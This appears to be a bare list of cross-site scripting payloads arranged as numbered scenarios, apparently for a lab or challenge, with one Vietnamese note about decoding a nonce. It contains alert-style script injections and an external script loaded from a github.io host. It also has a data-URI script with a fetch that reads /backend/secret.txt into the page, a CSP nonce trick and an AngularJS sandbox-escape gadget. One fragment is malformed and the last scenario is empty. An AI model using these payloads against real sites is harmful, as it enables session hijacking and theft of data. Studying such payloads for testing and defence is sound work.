Scenario 1:
<script>alert("XSS!!!");</script>

Scenario 2:
<script type="text/javascript" src="https://cthanhuit.github.io/xss-script/scripts.js"></script>
Scenario 3:
<script src="data:text/javascript,alert('XSS!')"></script>
fetch('/backend/secret.txt')
    .then(response => response.text())
    .then(data => {
        document.getElementById('output').innerText = data;
    });"></script>
Scenario 4:
nonce phải tự decode
<script nonce ="MjAyNCAwMTo0NQ==">alert('XSS!');</script>
Scenario 5:
<Script Src=https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.6.0/angular.min.js> </Script><K Ng-App>{{$new.constructor('alert("XSS!");')()}}
Scenario 6:
